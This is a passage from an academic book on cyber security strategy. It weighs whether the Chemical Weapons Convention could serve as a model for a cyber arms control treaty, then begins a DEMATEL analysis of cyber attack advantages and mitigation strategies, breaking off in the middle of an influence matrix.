grown so dependent on the Internet that governments may seek far- reaching strategic solutions to help ensure its security. Every day, more aspects of modern society, business, government, and critical infrastructure are computerized and connected to the Internet. As a consequence and for the sake of everything from the production of electricity to the integrity of national elections, network security is no longer a luxury, but a necessity.403 A fundamental challenge to better network security is that computers are highly complex objects that are inherently difficult to secure. The Common Vulnerabilities and Exposures (CVE) List grows by nearly one hundred every month.404 There are likely more pathways into your computer network than your system administrators can protect. And to a large degree, this explains the high return on investment en- joyed by cyber criminals and cyber spies. In the future, if war breaks out between two or more major world powers, one of the first victims could be the Internet itself. The reason is that classified cyber at- tack tools and techniques available to military and intelligence agencies are likely far more powerful than those available to the general public.405 However, as with chemical weapons (CW) and even with nuclear weapons, it is possible that non-state 403 Mostyn, 2000: At least a decade ago, the widespread use of anonymous email services to support criminal activity had convinced some that an international convention would be needed to regulate its use. 404 “Common Vulnerabilities and Exposures List,” The MITRE Corporation, http://cve.mitre.org/. 405 McConnell, 2010: Mike McConnell, former director of the U.S. National Security Agency and Director of National Intelligence, recently wrote in the Washington Post that “the lion’s share of cybersecurity expertise lies in the federal government.” 124 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES actors, including terrorists, will acquire strategically significant cyber attack tools and techniques in the future.406 What is to be done? Severing one’s connection to cyberspace is not an attractive op- tion. The benefits of connecting to the Internet usually outweigh the drawbacks; this quickly undermines a fortress mentality. And even theoretically “closed” networks – those with no direct connection to the Internet – are still subject to a wide range of computer network attacks (CNA).407 In light of our dependence on such vulnerable technology, and due to the fact that CNA is difficult to stop, world leaders may try to negotiate international agreements designed to contain conflict on the Internet.408 Cyber arms control is one possible strategy, and the 1997 Chemical Weapons Convention (CWC) may provide a strong candidate model.409 The Chemical Weapons Convention Chemical weapons (CW) are almost as old as warfare itself. Archeologists have found poison-covered arrowheads dating to 10,000 BC.410 In the First World War, CW may have caused one-third of the estimated 5 million casualties. Today, terrorists are at- tracted to CW not only for its killing power, but also due to its ease of acquisition.411 As a weapon, CW employs the toxic properties of certain chemicals in a way that can kill, injure or incapacitate humans and animals. Throughout history, each new generation of CW has been more dangerous than its predecessor.412 In 1997, 95 nations signed CWC, an international arms control agreement that has been a success by almost any measure. The treaty’s purpose is reflected in its full name: Convention on the Prohibition of the Development, Production, Stockpiling 406 Lewis, 2010: James Lewis of CSIS recently stated: “It remains intriguing and suggestive that [ter- rorists] have not launched a cyber attack. This may reflect a lack of capability, a decision that cyber weapons do not produce the violent results terrorists crave, or a preoccupation with other activities. Eventually terrorists will use cyber attacks, as they become easier to launch...”. 407 Military and intelligence agencies are capable of supply chain attacks, insider exploitation, the stand- off kinetic destruction of computer hardware, and the use of electromagnetic radiation to destroy unshielded electronics via current or voltage surges. 408 Markoff & Kramer, 2009a: According to The New York Times, Russian negotiators have long argued that an international treaty, similar to those that have been signed for WMD, could help to mitigate the threat posed by military activities to civilian networks, and that in 2009 the U.S. appeared more willing to discuss this strategy. 409 Others could be the Nuclear Non-Proliferation Treaty or the Biological Weapons Convention. 410 Mayor, 2008. 411 Newmark, 2001. 412 Ibid. 125 Arms Control: Can We Limit Cyber Weapons? and Use of Chemical Weapons and on their Destruction. Its goal is to eliminate the entire category of weapons of mass destruction (WMD) that is associated with toxic chemicals and their precursors. The CWC Preamble declares that achievements in chemistry should be used exclusively for beneficial purposes, and that the prohibi- tion on CW is intended “for the sake of all mankind.” Each signatory is responsible for enforcing CWC within its legal jurisdiction. This includes overseeing the destruction of existing CW and the destruction of all CW production facilities. Under the convention, all toxic chemicals are considered weap- ons unless they are used for purposes that are specifically authorized under CWC. Further, members are prohibited from transferring CW to or from other nations. CWC is administered by the Organization for the Prohibition of Chemical Weapons (OPCW), based in The Hague, which is an independent entity working in concert with the United Nations. OPCW has a staff of 500 and a budget of EUR 75 million.413 Currently, 188 nations, encompassing 98% of the global population, are party to CWC. A mere 13 years old, CWC has enjoyed the fastest rate of accession of any arms control treaty in history.414 Since 1997, over 56% of the world’s declared stock- pile of 71,194 metric tons of chemical agent has been destroyed, along with almost 50% of the world’s 8.67 million chemical munitions and containers.415 CWC: Lessons for Cyber Conflict Governments addressed the threat from CW by creating CWC. In order to counter the threat posed by cyber attacks and cyber warfare, world leaders may decide to create a similar regime, a Cyber Weapons Convention. In that event, international negotiators will likely examine CWC to see whether its principles are transferrable to the cyber domain. This author has identified five principles characteristic of CWC that may be useful in this context: political will, universality, assistance, prohibition, and inspection.416 Political will. On March 21, 1997, Presidents Bill Clinton and Boris Yeltsin issued a joint statement from Helsinki, stating that they were committed to the ratification of 413 OPCW website: www.opcw.org. 414 Challenges remain: Angola, Egypt, Israel, Myanmar, North Korea, Somalia, and Syria are still outside CWC; the U.S. and Russia are highly unlikely to meet the legally binding CW destruction deadline of April 2012; advances in science and technology pose constant challenges to the integrity of the inspections regime. 415 OPCW website: www.opcw.org. 416 I derived these five principles in part from the article Mikhail Gorbachev and Rogelio Pfirter wrote for Bulletin of the Atomic Scientists and from Oliver Meier’s interview with Pfirter in Arms Control Today. 126 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES CWC in order to “banish poison gas from the Earth.”417 At the end of the Cold War, the U.S. and Russia possessed the lion’s share of CW, and CWC could not have been a success without their leadership. However, all signatories had to be convinced that they had more to gain from joining CWC than they had to lose by remaining outside it. In the case of CW, there is a genuine abhorrence that the science of chemistry has been used for such lethal purposes, as well as a fear that terrorist groups – who lack the accountability of sovereign governments – will obtain CW. Universality. In 1997, more than two dozen countries possessed CW.418 Further- more, since CW technology was not difficult to acquire, that number would have continued to grow. CWC authors therefore designed the convention as a universal treaty with a universal and permanent goal. All nations are encouraged to become members, and the treaty’s endgame is the elimination of an entire class of WMD. Therefore, CWC represents the broadest possible multilateral security framework. At first glance, this strategy could be an obstacle to treaty advancement. However, universality also provides a strong recruitment incentive: peer pressure. A higher ratio of members to non-members increases one’s sense of security gained by acces- sion and heightens the isolation felt by those who remain on the outside. Assistance. OPCW offers enormous practical aid to CWC members. Above all, sig- natories are helped to fulfill treaty requirements, beginning with the destruction of CW and CW production facilities. Further, OPCW actively promotes the advance- ment of peaceful uses of chemistry for economic development. This includes the provision of training for local experts. Finally, OPCW offers advocacy to treaty mem- bers in the event they are threatened by the CW of another state. Prohibition. CWC has proven that verifiable destruction of CW and their produc- tion facilities is feasible. By 2010, over 50% of the world’s declared chemical agent stockpiles had been verifiably destroyed, as well as nearly 50% of declared chemical munitions. Some states had completely eliminated their CW programs. At the cur- rent rate, over 90% of the world’s known CW will be destroyed by 2012. Although seven nations remain outside CWC, no new states have acquired CW since 1997. The success of CWC stands in contrast to the 1968 Nuclear Non-Proliferation Treaty (NPT). Despite the efforts of NPT, the size of the world’s nuclear club has grown from five419 to nine.420 417 “The President’s News Conference...” 1997. 418 Cole, 1996. 419 These are also the permanent members of the United Nations Security Council: China, France, Russia, UK, and the U.S. 420 Huntley, 2009: De facto members now include India, Israel, Pakistan, and North Korea. 127 Arms Control: Can We Limit Cyber Weapons? Inspection. Since 1997, almost 4,000 CWC inspections have been conducted on the territory of 81 member states in order to verify treaty compliance. These have taken place at almost 200 known CW-related sites and at over 1,000 other industrial sites. Nearly 5,000 facilities around the world are liable to CWC inspection at any time. One of the primary benefits of CWC membership is the right to request a “challenge inspection” on the territory of a fellow member state, based on the principle of “any- time, anywhere,” with no right of refusal. Toward a Cyber Weapons Convention Cyber warfare is not chemical warfare. Although they share some similarities – in- cluding ease of acquisition, asymmetric damage, and polymorphism – the tactics, strategies, and effects are fundamentally different. Chemical warfare kills humans; cyber warfare kills machines.421 As a means of waging war, however, both chemical and cyber attacks represent a potential threat to national security. As such, diplomats may be asked to negotiate international agreements designed to mitigate the risk of cyber warfare, just as they have done for CW. The five principles described in the previous section have helped to make CWC a success. In this section, the author argues that the first three principles are clearly transferable to the cyber domain, while the final two are not. Political will. International treaties require widespread agreement on the nature of a common problem. The threat posed by cyber attacks – based on national capabili- ties as well as the fear that terrorists will begin to master the art of hacking – could be strong enough to form such a political consensus. The 2010 cyber attack on Google was serious enough to begin discussion in the U.S. on whether to create an ambassador-level post, modeled on the State Department’s counterterrorism coordi- nator, to oversee international cyber security efforts.422 As with CWC, a convention intended to help secure the Internet would need the major world powers behind it to succeed. At a minimum, in today’s world that means the U.S., Russia, China, and the EU.423 421 To be more specific, cyber attacks usually target the data resident on or functionality of a machine. It is also important to note that inoperable machines can kill humans: examples include medical equip- ment and national air defense systems. By the same token, chemical warfare can also kill flora, fauna, and human input to machines. 422 Gorman, 2010. 423 With CWC, the Middle East conflict continues to pose the most serious challenge to worldwide agree- ment, and it could do the same for a Cyber Weapons Convention. 128 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES Universality. One of the primary challenges to improved computer security is the fact that the Internet is a worldwide enterprise. The jurisdiction of law enforcement and counterintelligence personnel ends every time a network cable crosses an in- ternational border. Even though thousands of miles may separate an attacker and defender in the real world, everyone is a neighbor in cyberspace, and attackers often have direct access to their victims. Smart hackers hide within the maze-like archi- tecture of the Internet and route attacks through countries with which the victim’s government has poor diplomatic relations or no law enforcement cooperation. In 2010, there are plenty of cyber safe havens where criminals, spies and terrorists can operate without fear of reprisal.424 Although the global nature of cyberspace makes the practical task of securing the Internet inherently more difficult, the universal goals of CWC are highly appropriate in the cyber domain. Politicians, international negotiators, and the public will have no trouble understanding this characterization, and universality would be a cornerstone of a Cyber Weapons Convention. Assistance. Vulnerabilities in computer networks and the advantages they create for an attacker will persist for the foreseeable future. Consequently, organizations have no choice but to invest more time and effort into computer security. However, a proper implementation of best practices such as risk management, awareness train- ing, defense-in-depth, and incident handling425 usually requires more expertise and resources than most organizations and even many countries have available. Within CWC, OPCW offers practical aid to its members. In the same fashion, a Cyber Weap- ons Convention could create an internationally-staffed institution dedicated to help- ing signatories improve their cyber defense posture and respond effectively to cyber attacks when they occur. Experts could provide technical, legal, and policy advice via consultation and training. A crisis response team could be available to deploy worldwide at a moment’s notice, ready to publish its findings to the world. And as with CWC, the institution could actively promote the benefits of peaceful uses of computer technology for economic development and cooperation. One significant but difficult step for governments to take would be the joint instru- mentation and observation of the Internet and its network traffic flows. Many cyber threats, such as the one posed by botnet technology, simply move too quickly for the kind of traditional inspections that OPCW provides. Cyber attack mitigation re- quires immediate source identification and the ability to cross technical, legal, and national borders quickly. The best chance that future Cyber Weapons Convention 424 Gray & Head, 2009. 425 For example, the U.S. Computer Emergency Readiness Team (US-CERT) offers many free publications in the following categories: “General Internet security,” “Securing your computer,” “Recovering from an attack,” and “Monthly and quarterly reports” (www.us-cert.gov/reading_room/); however, most system administrators simply do not have the time to study, absorb, and implement all such recom- mendations. 129 Arms Control: Can We Limit Cyber Weapons? monitors would have is with access to real-time network data from across the whole of the Internet and the ability to collaborate immediately with treaty-empowered colleagues throughout the world.426 National sovereignty and data privacy concerns would have to be carefully guarded. Furthermore, the technical and forensic side of the regime should be separated as much as possible from its legal and political ramifications. Data analysts could not have access to any personally identifiable information, but when cyber attacks are observed, the appropriate law enforcement organizations must be notified. Prohibition. The proof that CWC has been a success lies in the large volume of CW that has been verifiably destroyed. The principle of prohibition, however, would be the most challenging aspect of CWC to apply in cyberspace. Malicious computer code is notoriously difficult to define. In the single month of May 2009, Kaspersky Anti-Virus Lab found 42,520 “unique malicious, advertising, and poten- tially unwanted” programs on its clients’ computers.427 Even in a well-designed and malware-free network, a legitimate path for remote system administration can be used by a masquerading hacker, who has correctly guessed or stolen its password, to thoroughly undermine its confidentiality, integrity, and/or availability. Any com- puter programmer can learn to write malware, and non-programmers can simply download professional-quality attack tools from well-known websites. Further, cy- ber warfare is unlike chemical warfare in that cyber attacks often demand stealth and anonymity. At a minimum, any prohibition on malware will require substantial progress on solving the cyber attack “attribution” problem.428 This will take time, and involve technical, legal, and international cooperation on a level far higher than it exists today. Inspection. Similar to prohibition, the CWC inspection regime has been a success, but it is difficult to imagine how the principle of inspection could easily be applied in cyberspace. Around the world, 5,000 industrial facilities are subject to CWC in- spection at any time; this is a large but manageable number. Compare it to the amount of digital information that can be placed on one removable thumb drive. In 2010, a 256 GB USB Flash drive cost under $1000;429 it held over 2 trillion bits of data. Even widely-published operating system and application code can be almost impossible to understand thoroughly – even for experts – because there is simply 426 Such an effort would be daunting from a technical perspective, but in theory, if this is possible to accomplish in one large country, it should be possible across the globe. On a human level, thousands of international CERT personnel already do it on a less formal basis every day. 427 “Monthly Malware Statistics...” 2009. 428 This refers to anonymous cyber attacks, described in the Universality section above. 429 The Kingston DataTraveler® 310 is currently advertised as the highest capacity USB Flash drive on the market. 130 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES too much information to analyze.430431 Malware can be written on any computer, and transmitted to the Net from any network access point. In the U.S. alone, there are 383 million computers connected directly to the Internet.432 In theory, a Cyber Weapons Convention could require closer inspection and monitoring at the Internet Service Provider (ISP) level. However, such regimes are already commonplace, such as China’s Golden Shield Project, the European Convention on Cybercrime, Russia’s SORM,433 and the USA PATRIOT Act. Each is unique in terms of guidelines and en- forcement, but all face the same problem of overwhelming traffic volume. The Challenges of Prohibition and Inspection The challenge of securing the Internet appears to be worsening with time.434 World leaders may eventually decide that the best way to mitigate the threat posed by cy- ber attacks is by signing an international cyber arms control treaty.435 The Chemical Weapons Convention (CWC) constitutes a useful model. It boasts the vast majority of world governments as signatories and has tangibly reduced the threat of chemical warfare, both by delegitimizing the use of chemical weapons (CW) and by dramatically reducing the quantity of CW in existence. This chapter highlights five principles that have helped to make CWC a success, and examines each principle to see whether it could support the development of a Cyber Weapons Convention. 430 Cole, 2002. 431 Even if it were possible, software is dynamic. Programs constantly change their functionality via security patches and other updates. 432 This figure is from The World Factbook, published by the U.S. Central Intelligence Agency, and de- scribes the number of “Internet hosts” in a country. These are defined as “a computer connected directly to the Internet ... Internet users may use either a hard-wired terminal ... or may connect remotely by way of a modem via telephone line, cable, or satellite to the Internet Service Provider’s host computer.” 433 Система Оперативно-Розыскных Мероприятий or “System for Operative Investigative Activi- ties.” 434 Geers, 2010. 435 “Espionage Report...” 2007; Cody, 2007: Many vignettes could be recited here. In 2007, German Chan- cellor Angela Merkel visited China for a state meeting which was overshadowed by a media claim that Chinese hackers had been caught attempting to steal data from Merkel’s chancellery and other Berlin ministries. The Chinese government denied the allegations, but Prime Minister Wen Jiabao nonethe- less told Merkel that measures would be taken to “rule out hacking attacks.” The following month, Chinese Vice Information Industry Minister Lou Qinjian wrote in a Communist Party magazine that foreign intelligence services had also caused “massive and shocking” damage to China via computer hacking. 131 Arms Control: Can We Limit Cyber Weapons? The first three principles – political will, universality, and assistance – are easy to apply in the cyber domain. None of them is a perfect fit, but as with CWC, all of them are appropriate to the nature and challenges of managing Internet security. The final two principles – prohibition and inspection – are not helpful at this time. It is difficult to prohibit or inspect something that is hard to define and which grows by orders of magnitude on a regular basis. In fact, these two catches could prove sig- nificant enough that a future treaty may not be called Cyber Weapons Convention, but something more generic, such as Internet Security Convention. On balance, the three applicable principles provide world leaders with a good start- ing point to explore the prospects for a Cyber Weapons Convention. If national and Internet security thinkers decide that an international cyber arms control treaty is the right way forward, political leaders may give scientists the funding they need to attack the technical challenges of prohibition and inspection. 132 DATA ANALYSIS AND RESEARCH RESULTS IV. DATA ANALYSIS AND RESEARCH RESULTS 9. DEMATEL AND STRATEGIC ANALYSIS In this research study, the author will employ the Decision Making Trial and Evalua- tion Laboratory (DEMATEL) to analyze the most important concepts and definitions. The goal of using DEMATEL is twofold: to increase the rigor of the author’s analysis via scientific method, and to help provide decision makers with greater confidence as they attempt to choose the most efficient ways to mitigate the threat of cyber at- tacks and improve cyber security at the strategic level. DEMATEL is a comprehensive scientific research method, developed in the 1970s by the Science and Human Affairs Program at the Battelle Memorial Institute in Geneva. It is used to solve scientific, political and economic problems that contain a complex array of important factors,436 which may involve many stakeholders.437 It has often been used, especially by researchers in Middle East and Far East, to inves- tigate problems of strategic scope and significance.438 First, a DEMATEL researcher must identify and classify the key concepts or the most influential factors in a given system or in a particular area of research. Second, all factors are placed into a pair-wise, “direct-influence” comparison matrix and prioritized by their level of influence on the other factors in the system: zero, or “no influence,” to four, or “very high influence.” The matrix isolates all of the factors within the system, as well as their one-to-one relationships.439 It displays the level of influence that each factor exerts on every other factor in the system, and provides a clear ranking of alternatives by influence level.440 Third, the influencing factors are depicted in a causal loop diagram that graphically displays how each factor exerts pressure on, and receives pressure from, all other factors in the system, including the strength of each influence relationship. 436 Gabus & Fontela, 1972; Gabus & Fontela, 1973. 437 Jafari et al, 2008. 438 Several are cited in this paper, below. 439 Hu et al, 2010. 440 Dytczak & Ginda, 2010. 133 DEMATEL and Strategic Analysis Fourth, DEMATEL calculates the combined effect of both the direct and indirect influence relationships, yielding a new overall influence score for all factors in the system. It is then possible to place all factors into a hierarchical structure. In this way, DEMATEL helps to provide decision makers with the most efficient paths to a desired outcome. These contribute to workable solutions at the tactical level441 and superior policy choices at the strategic level.442 DEMATEL Influencing Factors Parts II and III of this book described cyber security as an emerging strategic con- cept and examined four mitigation strategies that governments will likely adopt to counter the cyber attack threat. Fig. 1, below, summarizes these concepts as DEMA- TEL “influencing factors.” Each is defined in more detail in this chapter. Figure 1. DEMATEL “Influencing Factors.” National Security Threats A cyber attack is best understood not as an end in itself, but as an extraordinary means to a wide variety of ends. At the tactical level, there are many objectives that an attacker seeks. Here are five of the most important. 441 Hu et al, 2010. 442 Moghaddam et al, 2010. 134 DATA ANALYSIS AND RESEARCH RESULTS Espionage. Every day, anonymous computer hackers steal vast quantities of com- puter data and network communications. In fact, it is possible to conduct devastat- ing intelligence-gathering operations, even on highly sensitive political and military communications, remotely from anywhere in the world. Propaganda. Cheap and effective, this is often the easiest and the most powerful form of cyber attack. Propaganda dissemination may not need to incorporate any computer hacking at all, but simply take advantage of the amplification power of the Internet. Digital information, in text or image format and regardless of whether it is true – can be instantly copied and sent anywhere in the world, even deep behind enemy lines. And provocative information that is censored from the Web can reap- pear elsewhere in seconds. Denial-of-Service (DoS). The simple strategy behind a DoS attack is to deny the use of data or a computer resource to legitimate users. The most common tactic is to flood the target with so much superfluous data that it cannot respond to real requests for services or information. Today, black market botnets provide anyone with massive Distributed DoS (DDoS) resources and a high level of anonymity. Other DoS attacks include the physical destruction of computer hardware and the use of electromagnetic interference, designed to destroy unshielded electronics via current or voltage surges. Data modification. A successful attack on the integrity of sensitive data is insidious because legitimate users (human or machine) may make subsequent critical deci- sions based on maliciously altered information. Such attacks range from website de- facement, which is often referred to as “electronic graffiti,” but which can still carry propaganda or disinformation, to the corruption of advanced weapons or command- and-control (C2) systems. Infrastructure manipulation. National critical infrastructures are, like everything else, increasingly connected to the Internet. However, because instant response may be required, and associated hardware could have insufficient computing resources, security may not be robust. Furthermore, the infrastructure could require instant or automatic response, so it may be unrealistic to expect that a human would be avail- able to concur with every command the infrastructure is given.443 Complicating matters is the fact that most critical infrastructures are in private hands. Internet Service Providers (ISP), for example, typically lease communication lines to government as well as to commercial entities, and it is not uncommon for 443 Geers, 2009. 135 DEMATEL and Strategic Analysis satellite management corporations to offer bandwidth to multiple countries at the same time.444 The management of electricity is essential for national security planners to evaluate because electricity has no substitute, and all other infrastructures, including com- puter networks, depend on it.445 Finally, it is important to note that many critical in- frastructures are in private hands, outside of government protection and oversight. Key Cyber Attack Advantages As a medium through which a nation-state or a non-state actor can threaten the security or national security of a rival or adversary, cyberspace offers attackers numerous key advantages that facilitate and amplify the three traditional attack categories of confidentiality, integrity and availability. These are illustrated in Fig. 2, below. Figure 2. Key Cyber Attack Advantages. Vulnerability. The Internet has an ingenious modular design that is remarkably resilient in the face of many classes of cyber attack. However, hackers regularly find sufficient flaws in its architecture to secretly read, delete, or modify informa- tion stored on or traveling between computers. Further, the rapid proliferation in 444 Ibid. 445 Divis, 2005. 136 DATA ANALYSIS AND RESEARCH RESULTS communications technologies provides sensitive sites with a level of redundancy unimagined in the past. However, on the downside it is a challenge for defenders to keep up with the latest attack methods. In fact, there are about 100 additions to the Common Vulnerabilities and Exposures (CVE) database each month.446 Constantly evolving malicious code often gives hackers more paths into a network than its sys- tem administrators can protect. Asymmetry. Nations, organizations, and individual hackers find in computer hack- ing a very high return on investment. An attacker’s common goals are self-explana- tory: the theft of research and development data, eavesdropping on sensitive com- munications, and the delivery of propaganda behind enemy lines. The elegance of computer hacking lies in the fact that it may be attempted for a fraction of the cost – and risk – of many other information collection or manipulation strategies. Anonymity. The maze-like architecture of the Internet offers cyber attackers a high degree of anonymity. Smart hackers route their attacks through countries with which the victim’s government has poor diplomatic relations or no law enforcement cooperation. Even successful cyber investigations often lead only to another hacked computer. Governments today face the prospect of losing a cyber conflict without even knowing the identity of their adversary. Inadequacy of cyber defense. Computer network security is still an immature disci- pline. Traditional security skills are of marginal help in cyber warfare and it is diffi- cult to retain personnel with marketable technical expertise. Challenging computer investigations are further complicated by the international nature of the Internet. Moreover, in the case of state-sponsored cyber operations, law enforcement coop- eration is naturally non-existent. The rise of non-state actors. The Internet era offers to everyone vastly increased participation on the world stage. Historically, governments have endeavored to re- tain as much control as they can over international conflict. However, globalization and the Internet have considerably strengthened the ability of anyone to follow cur- rent events and have provided a powerful means to influence them. Domestic and transnational subcultures now spontaneously coalesce online, sway myriad political agendas, and may not report to any traditional chain-of-command. A future chal- lenge for world leaders is whether their own citizens could spin delicate interna- tional diplomacy out of control. 446 “Common Vulnerabilities and Exposures List,” The MITRE Corporation, http://cve.mitre.org/. 137 DEMATEL and Strategic Analysis Cyber Attack Categories There are three basic forms of cyber attack, from which all others derive. Confidentiality. This encompasses any unauthorized acquisition of information, including surreptitious “traffic analysis,” in which an attacker infers communica- tion content merely by observing communication patterns. Because global network connectivity is currently well ahead of global network security, it can be easy for hackers to steal enormous amounts of information. Cyber terrorism and cyber warfare may still lie in our future, but we are already liv- ing in a Golden Age of cyber espionage. The most famous case to date is “GhostNet,” investigated by Information Warfare Monitor, in which a cyber espionage network of over 1,000 compromised computers in 103 countries targeted diplomatic, politi- cal, economic, and military information.447 Integrity. This is the unauthorized modification of information or information re- sources such as a database. Integrity attacks can involve the “sabotage” of data for criminal, political, or military purposes. Cyber criminals have encrypted data on a victim’s hard drive and then demanded a ransom payment in exchange for the decryption key. Governments that censor Google results return part, but not all of the search engine’s suggestions to an end user. Availability. The goal here is to prevent authorized users from gaining access to the systems or data they require to perform certain tasks. This is commonly referred to as a denial-of-service (DoS) and encompasses a wide range of malware, network traffic, or physical attacks on computers, databases and the networks that connect them. In 2001, “MafiaBoy,” a 15 year-old student from Montreal, conducted a successful DoS attack against some of the world’s biggest online companies, likely causing over $1 billion in financial damage.448 In 2007, Syrian air defense was reportedly dis- abled by a cyber attack moments before the Israeli air force demolished an alleged Syrian nuclear reactor. 447 “Tracking GhostNet...” 2009. 448 Verton, 2002. Strategic Cyber Attack Targets Cyber attacks of strategic significance do not occur every day. In fact, it is likely that the most powerful cyber weapons may be saved by militaries and intelligence agen- cies for times of international conflict and war. Some war tactics will change in order to account for the unique nature of cyber- space and for the latent power of cyber warfare, but the ultimate goal of war – vic- tory – will not change. As in past wars and as with other types of aggression, there are two broad categories of strategic targets that cyber attackers will strike. Military forces. The first category of cyber attacks would be conducted as part of a broader effort to disable the adversary’s weaponry and to disrupt military com- mand-and-control (C2) systems. In 1997, the U.S. Department of Defense (DoD) held a large-scale cyber attack red team exercise called Eligible Receiver. The simulation was a success. As James Ad- ams wrote in Foreign Affairs, thirty-five National Security Agency (NSA) personnel, posing as North Korean hackers, used a variety of cyber-enabled information war- fare tactics to “infect the human command-and-control system with a paralyzing level of mistrust ... as a result, nobody in the chain of command, from the president on down, could believe anything.”449 In 2008, unknown hackers broke into a wide range of DoD computers, including a “highly protected classified network” of Central Command (CENTCOM), the organi- zation which manages both wars in which the U.S. is now engaged. The Pentagon was so alarmed by the attack that Chairman of the Joint Chiefs Michael Mullen personally briefed President Bush on the incident.450 In the event of a future war between major world powers, it is wise to assume that the above-mentioned attacks would pale in comparison to the sophistication and scale of cyber tools and tactics that governments may hold in reserve for a time of national security crisis. Government/civilian infrastructure. The second category of cyber attacks would target the adversary’s ability and willingness to wage war for an extended period of time. The targets would likely include an adversary’s financial sector, industry, and national morale. One of the most effective ways to undermine a variety of these second-tier targets is to disrupt the generation and supply of power. President Obama’s announcement 449 Adams, 2001. 450 Barnes, 2008. 138 DATA ANALYSIS AND RESEARCH RESULTS 139 DEMATEL and Strategic Analysis that unknown hackers had “probed our electrical grid” and “plunged entire cities into darkness”451 in Brazil452 should serve as a wake-up call for many. Referring to theoretical cyber attacks on the financial sector, former U.S. Director of National Intelligence (DNI) Mike McConnell stated that his primary concern was not the theft of money, but a cyber attack that would target the integrity of the financial system itself, designed to destroy public confidence in the security and supply of money.453 In a future war between major world powers, militaries would likely exploit the ubiq- uity of cyberspace and global connectivity to conduct a wide range of cyber attacks against adversary national critical infrastructures, on their home soil, deep behind the front lines of battle. Cyber Attack Mitigation Strategies This research has shown that cyber attackers possess significant advantages over cyber defenders, and that governments must now take the threat of strategic-level cyber attacks seriously. The four mitigation strategies examined in Part III are sum- marized below. Fig. 3 is a causal loop diagram that shows how cyber attack mitigation strategies are designed to reduce the impact of cyber attack advantages, with the ultimate goal of reducing threats to national security via cyberspace. Figure 3. Cyber Attack Mitigation Strategies. 451 “Remarks...” 2009. 452 “Cyber War...” 2009. 453 Ibid. 140 DATA ANALYSIS AND RESEARCH RESULTS IPv6: The complex and evolving nature of IT tends to favor an attacker, who often finds a surfeit of network vulnerabilities to exploit. At the same time, the benefits of connectivity continue to ensure that returning to pen and paper is not an option. If there is a leading current technical solution to the cyber attack problem, a reason- able argument can be made for Internet Protocol version 6 (IPv6), which is replacing IPv4 as the “language” of the Internet. The first benefit of IPv6 is that it instantly solves the world’s shortage of computer addresses.454 However, its chief security enhancement – mandatory support for Internet Protocol Security (IPSec) – is in fact an optional feature that may not be widely used for reasons of convenience. Fur- thermore, during the long transition phase ahead, there will be an increased “attack surface” as hackers exploit vulnerabilities in both IP languages at once.455 Military doctrine: Cyberspace is a new warfare domain, in which computers are both a weapon and a target. Future military concepts and doctrine must find a way to encompass cyber attack and defense strategies and tactics. However, even the most influential military treatise in history, Sun Tzu’s Art of War, which is renowned for its flexibility and adaptability to new means and methods of war, has great dif- ficulty subsuming many aspects of cyber warfare. The author described ten distinc- tive characteristics of the cyber battlefield, none of which fits easily into Sun Tzu’s paradigm. Deterrence: There are only two deterrence strategies available to nation-states: de- nial of a threatening technology (e.g., nuclear weapons) and punishment. With cyber weapons, denial is a non-starter because hacker skills and tools are easy to acquire. Punishment via retaliation is the only option, but to be an effective deterrent, a threat has to be credible. Here again, the challenges of poor attacker attribution and high attack asymmetry in cyberspace undermine the credibility of deterrence. Fur- ther, they create problematic doctrinal questions for military rules of engagement.456 Arms Control: In the future, world leaders may negotiate an international treaty on the use of cyber weapons.457 However, arms control relies on two principles that are not easy to apply in cyberspace: prohibition and inspection. First, it is difficult to prohibit something that is hard to define, such as malicious code. And even in a malware-free organization, hackers are adept at using legitimate paths to network access, such as by guessing or stealing a password. Second, it is hard to inspect something that is difficult to count: a USB Flash drive now holds up to 256 GB or 454 IPv4 contains around 4 billion IP addresses; IPv6 has 340 undecillion, or 50 octillion IPs for every human on planet Earth. 455 Geers & Eisen, 2007. 456 Geers, 2010b. 457 Markoff & Kramer, 2009a: Russian negotiators have long argued that an international treaty, similar to those that have been signed for WMD, could help to mitigate the cyber threat. In 2009, the U.S. was reportedly more willing to discuss this proposal than in the past. 141 DEMATEL and Strategic Analysis over 2 trillion bits of data, and in the U.S. alone, there are over 400 million Internet- connected computers.458 A summary of the four mitigation strategies and their relative effectiveness is de- picted in Fig. 4. Strategy Evaluation All could help ... But each is only a partial solution IPv6 > Increases attribution by lowering anonymity IPsec authenticates, encrypts; not mandatory Long, dangerous transition phase > Art of War > Sun Tzu good but not perfect Concepts, law behind tech curve Cyber warfare has distinctive characteristics > Deterrence > Denial difficult, hacker skills easy to acquire Punishment lacks credibility Low attribution, high asymmetry, no one dies > Arms Control > How to prohibit what is hard to define? How to inspect cyberspace? Political will could change dynamics > Figure 4. Mitigation Strategy Effectiveness. This chapter summarized the key concepts, or influencing factors, in this research. The next chapter will examine the two most important concept categories – “key cyber attack advantages” and “cyber attack mitigation strategies” – with the aid of DEMATEL. The goal is to derive a more precise conclusion to this book via stronger scientific method. 458 Geers, 2010c. 142 DATA ANALYSIS AND RESEARCH RESULTS 10. KEY FINDINGS The author will employ the DEMATEL method to analyze the two most important categories of influencing factors in this research – cyber attack advantages and cy- ber attack mitigation strategies – with four primary objectives in mind: • to understand how the key concepts in this book, both individually and cat- egorically, influence one another; • to visualize the system they comprise with the aid of a causal loop diagram; • to understand the extent to which the system may be controllable; and • to prioritize the mitigation strategies for decision makers according to their impact on reducing the cyber attack advantages and on positively affecting the system of strategic cyber security as a whole. The “Expert Knowledge” Matrix Matrix X, depicted in Fig. 5, is a DEMATEL “Expert Knowledge” influence matrix that juxtaposes the cyber attack advantages and mitigation strategies according to their level of influence on one another. The advantages are lettered A-E, and the strategies are F-I. Each individual influence value in the matrix is based on the research presented in this book and on the author’s judgment as a subject matter expert with over ten years working as a cyber intelligence analyst. As detailed in the Bibliography, the author has published peer-reviewed research examining and evaluating the efficacy of all nine influence factors. For future research purposes, it is clear that different influence estimates will per- tain in different national contexts, and that the dynamic nature of cyberspace will ensure that most if not all the variables will change over time. The reader is thus encouraged to tailor the matrix to his or her needs and to ag- gregate or disaggregate individual influence factors for more general or for more specific research goals. The mathematics, however, are well-founded, and remain the same. 143 Key Findings A B C D E F G H I DEMATEL “Expert Knowledge” Influence Matrix X None =0 Low=1 Medium=2 High=3 Very High=4 IT Vulnerabilities Asymmetry Anonymity Inadequate Cyber Defense Emp. Non-State Actors Next Gen Internet: IPv6 Best Mil Doctrine: Sun Tzu Cyber 